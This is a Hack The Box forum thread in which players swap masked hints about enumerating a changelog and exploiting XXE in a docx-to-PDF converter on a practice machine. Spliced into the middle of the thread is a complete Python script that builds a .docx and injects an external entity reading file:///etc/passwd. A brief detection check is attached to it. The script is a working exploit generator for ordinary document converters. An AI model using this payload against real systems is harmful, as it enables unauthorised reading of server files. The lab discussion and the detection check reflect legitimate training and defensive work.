Patents


Comments

  • Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

  • edited January 2020

    @gbyolo said:

    I think it's time to give some hints about the initial foothold.
    As I could understand by talking to some of you on social channels, the "obvious" vulnerability everybody is talking about is correct, however you are all missing some important information to correctly exploit it.
    Try to use a different wordlist to find something useful in the web app. Maybe some developer left traces of a changelog!

    Well consider me truly bamboozled. After many hours of trying the obvious path I see this post, and spend quite a few more hours throwing different wordlists from seclists/dirb/dirbuster/wfuzz at the site. Full recursion, .log, .txt, .conf, .html, .php extensions and nothing. The only changelogs found were in /v***/s***/*/c***. They don't seem to be useful.

  • @arale61 said:

    Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

    That's exactly where I am XD I'm wondering if I should be looking at u*****.p and not c******.p

  • @idomino said:

    @arale61 said:

    Didn't get that changelog from the developer, but managed to get some dependencies file pointing to some conversion utility... then... generated a pdf from a normal docx and checked what was the version of the thing to try to attack... got to some papers and blogs,... tried to embed this to that, upload that and nothing! keep failing every single step. aux what a box...
    Any help will be appreciated.

    pm please!

    That's exactly where I am XD I'm wondering if I should be looking at u*****.p and not c******.p

    But the thing here for me is in the conversion process, since it is the only form of input I see we can try to 'control'.
    I've been messing around with different types of XXE and SSRF attacks but I didn't get any response back from them...
    I will retry again, from the beginning, starting again from XXE... let's see what I can get this time that's different.

  • Hi all,

    This will be my first difficult box.

    I did have a little go a couple of days ago but this one looks like it needs some time.

    Did anyone figure out what is listening on port 8888?

    I'm not convinced that it's the service nmap is reporting.

    If I have helped you in some way, I'd appreciate it if you could respect my account on htb.
  • Is that changelog file really necessary to exploit the vuln? I find it hard to believe that someone found it in the first 6 hours given that my scans would take days and are only looking for a very reduced set of extension types (.lst, .md, .txt...) and with just 30 threads I'm getting loads of I/O exception errors...

    Regarding the vuln, I've been able to make the server get a file from my server but I don't think it will lead to a real vuln, unless that file is dropped in a folder or something. Trying to make the server load a local file through file:/// and putting it in the pdf doesn't seem to work either...

  • The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in deep rabbit holes!
  • Finally got user. Really insane box. Mixed feelings at first, but really warmed up to it so far. Also don't plan to respond to PMs for a few days, so don't expect a quick answer if you want help!

    clubby789

    • GCIH | GCIA
      If you need help with something, PM me how far you've got already, what you've tried etc (I won't respond to profile comments, or on box release night). And remember to +respect me if I helped you ; )
  • @clubby789 said:

    Finally got user. Really insane box. Mixed feelings at first, but really warmed up to it so far. Also don't plan to respond to PMs for a few days, so don't expect a quick answer if you want help!

    Any hints on the initial foothold? driving me crazy!

  • Also got user, thanks to @clubby789 for the last push. PM for nudges on foothold and user.

  • I found a way to sneak in a Doctor X format but I can't tell if the backend conversion uses s****ce or uno****.

    limbernie
    Write-ups | Discord - limbernie#0386

  • edited January 2020

    Is it possible to circumvent the checking of w*/d.x** to load an o** instead of a docx? If so pm pls!

    Finally been able to load an o** file into the converter and it seems like it doesn't use a vulnerable u******v, or doesn't use u******v at all. In my vm with the --unsafe-quiet-update flag I was getting good results dumping my /etc/passwd. Time to check more xx* ss** but it doesn't look good, I think I entered a big rabbit hole.

    L*********e is version 6.0.7 so not vulnerable to webservices and their only vulns are the ones based on py*** l**o that are not gonna work in headless mode.

    Looks like I need to go back to enumerating web files in order to find that changelog with the necessary info to exploit. Hope the initial hype is over and now I can finish the scans this time in the free server...

  • config.php in upload.php source code, yet nothing ;)

  • When I hear some file extensions.

    Spiderixius

  • And rooted. Long and hard, but definitely learnt some new things.

    clubby789

  • I got the passwd file, some hints to get user please?
    there is no place like 127.0.0.1
  • @salt said:

    The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in deep rabbit holes!

    TWO? Oh my... I 've found only one! Gotta enumerate again :(

    BadRain

  • edited January 2020

    Got www-data, some hints from here?
  • Tbh this one is flattening me lmao and I've done this class of vuln multiple times in real life save me lol

  • Finally got initial foothold. Looking for user now.


  • Got user.


  • @th3y said:

    Finally got initial foothold. Looking for user now.

    Any nudge on the famous changelog file?

  • At last got user, working on the root part now.

    Foothold is def p2w. I would have found the file long ago if I/O exceptions and user reboots weren't a thing.

  • edited January 2020

    @sysdd said:

    @th3y said:

    Finally got initial foothold. Looking for user now.

    Any nudge on the famous changelog file?

    Read point 4 to get an idea of the limits of how weird the filename can be:
    https://forum.hackthebox.eu/discussion/1467/machine-submission-checklist

    Then GL, don't get disconnections that disturb the discovery process.

  • Any hint for a real machine shell?

  • edited January 2020

    Could someone recommend an article or method for how to properly put malicious stuff in a docx for this machine? I have no experience in this field; for now I could not understand how it works just by looking deeper into the docx.

  • Hi, finally got user.
    For the initial step, you really need to find the changelog... There's one file on one of the paths of the website that is the key for the corresponding attack... That changelog gives you the correct 'configuration' for the docx. If you're not able to do that into the docx, maybe you can find one that already has it on the inet, modify it and done. But this is not the end of the road for accessing the box. You will need to do more steps to get in.
    I felt the part of 'configuring' the docx was harder than the attack itself (for that you'll find plenty of examples in the wild, well documented) and I wanted to explain it here for the people like me that are struggling with it.
    So, first, as the creator said, find that changelog, read it and go for the next step.
    Feel free to mark this response as a spoiler, it was not my intention, but I wanted to give this explanation to help others that were in the same position as me.
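The 'configuring the docx' step that several posts above circle around (injecting an XXE payload into a document that a server-side converter will parse) is easier to see in code than to describe. The script below is an added example written for this page; it is not part of the thread, not from any box material, and it does not resolve the masked filenames people are hinting at. It treats a .docx as what it is, a ZIP of OOXML XML parts, builds a constructed minimal package, injects an external-entity declaration into one part (the standard OOXML main document part `word/document.xml` is assumed as the target part), and, for the converter side, shows the check a converter front end should run: OOXML parts never need a DTD, so any part carrying a DOCTYPE or ENTITY declaration should be rejected before the file reaches an entity-expanding parser. The `file:///etc/passwd` target and the package contents are constructed sample data.

```python
import io
import zipfile

# Constructed sample package. Part names are the standard OOXML ones, used
# here as an assumption for the demo; they are not the thread's masked paths.
MAIN_PART = "word/document.xml"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)
RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    '</Relationships>'
)
DOCUMENT_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    f'<w:document xmlns:w="{W_NS}"><w:body><w:p><w:r><w:t>PLACEHOLDER</w:t></w:r></w:p></w:body></w:document>'
)


def build_minimal_docx() -> bytes:
    """Assemble the smallest package Word-style converters will still open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr(MAIN_PART, DOCUMENT_XML)
    return buf.getvalue()


def inject_xxe(docx_bytes: bytes, target: str, part: str = MAIN_PART,
               marker: str = "PLACEHOLDER") -> bytes:
    """Copy the package, adding to `part` an internal DTD that declares an
    external general entity pointing at `target`, and referencing that entity
    where `marker` text stood. A converter whose XML parser expands external
    entities pulls the resource into the rendered text, hence into the PDF.
    The DOCTYPE name need not match the root element for a non-validating parser."""
    dtd = f'<!DOCTYPE x [\n  <!ENTITY xxe SYSTEM "{target}">\n]>\n'
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == part:
                text = data.decode("utf-8")
                # The DTD must sit between the XML declaration and the root element.
                cut = text.index("?>") + 2 if text.startswith("<?xml") else 0
                text = text[:cut] + "\n" + dtd + text[cut:].lstrip()
                text = text.replace(marker, "&xxe;", 1)
                data = text.encode("utf-8")
            dst.writestr(name, data)
    return out.getvalue()


def read_part(docx_bytes: bytes, part: str) -> str:
    """Return one XML part of the package as text (used to inspect results)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return z.read(part).decode("utf-8")


DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def find_dtd_parts(docx_bytes: bytes) -> list:
    """Defender-side check: list XML/rels parts carrying a DOCTYPE or ENTITY
    declaration. A converter front end should reject any such upload."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        return [
            n for n in z.namelist()
            if n.lower().endswith((".xml", ".rels"))
            and any(m in z.read(n).upper() for m in DTD_MARKERS)
        ]


if __name__ == "__main__":
    clean = build_minimal_docx()
    evil = inject_xxe(clean, "file:///etc/passwd")
    print("DTD-bearing parts, clean package:", find_dtd_parts(clean))
    print("DTD-bearing parts, injected package:", find_dtd_parts(evil))
    print(read_part(evil, MAIN_PART))
```

The entity is referenced inside a `<w:t>` run so the fetched content lands in the visible text rather than in an attribute; whether the converter actually expands it depends on how its XML parser is configured, which is exactly what the thread's back-and-forth about versions and headless mode is about. The `find_dtd_parts` check is cheap because it runs on the raw bytes before any parser touches them.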

  • @salt said:

    The wordlist is the key, tried tonnes until I got that one from SecLists.

    Got the two changelogs, trying to figure out what's going on, the i**l seems vulnerable and the s****y on that version also seems vulnerable. I hope I'm not drowning in deep rabbit holes!

    Hi

    Did you have to try the lists on multiple paths and not just the root path?

    I've tried many lists from the seclist repo but none seem to find the changelog file.

    There is one list from that repo called sy..... but this seems too obvious?

    A nudge would be appreciated.

    Cheers

    If I have helped you in some way, I'd appreciate it if you could respect my account on htb.
  • Finally got through the first part ( with some help) ! Now sleep and look at the next part tomorrow :)

    GPLO

  • Super stumped on root...
